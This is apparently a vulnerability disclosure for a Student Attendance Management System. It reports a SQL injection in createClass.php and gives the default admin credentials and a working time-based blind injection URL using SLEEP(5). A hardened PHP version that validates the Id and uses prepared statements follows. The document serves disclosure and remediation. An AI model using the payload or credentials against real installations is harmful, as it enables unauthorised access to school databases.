SQL injection vulnerability in Student Attendance Management System. Log in to the admin backend with admin@mail.com / Password@123, then modify the information in createClass.php. The ID is assigned to the variable $ID and then inserted into the database query, and the query information is returned, causing a SQL injection vulnerability.
2. SQL injection PoC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---
Use sqlmap to verify
Manual verification
SLEEP(5)
SLEEP(8)
Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4
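A hardened form of the `Id` handling the report describes, as an added example that is not the project's own code. The table and column names (`classes`, `Id`, `className`), the helper names and the `DB_*` environment variables are assumptions.

```php
<?php
// Added example, not the project's code. Table/column names, helper names
// and the DB_* environment variables are hypothetical.

// Pattern the report describes (kept as a comment, for contrast only):
//   $Id = $_GET['Id'];
//   mysqli_query($conn, "SELECT * FROM classes WHERE Id = '$Id'");

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // raise exceptions on DB errors

/** Accept only a positive decimal integer; anything else yields null. */
function parseClassId($raw): ?int
{
    if (!is_string($raw)) {          // missing parameter or array form (Id[]=1)
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up one class row with a bound integer parameter. */
function fetchClassForEdit(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare('SELECT Id, className FROM classes WHERE Id = ?');
    $stmt->bind_param('i', $id);     // value travels separately from the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs; the second is the Id value from the report's PoC URL.
    var_dump(parseClassId('2'));
    var_dump(parseClassId("2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---"));
} elseif (($_GET['action'] ?? '') === 'edit') {
    $id = parseClassId($_GET['Id'] ?? null);
    if ($id === null) {
        http_response_code(400);
        exit('Invalid Id');
    }
    $conn = new mysqli(getenv('DB_HOST'), getenv('DB_USER'), getenv('DB_PASS'), getenv('DB_NAME'));
    $row = fetchClassForEdit($conn, $id);
    echo $row ? htmlspecialchars($row['className'], ENT_QUOTES) : 'Class not found';
}
```

The integer check and the bound parameter are independent layers: either one alone keeps the `Id` value out of the SQL text, and together they also reject malformed requests before a database connection is opened.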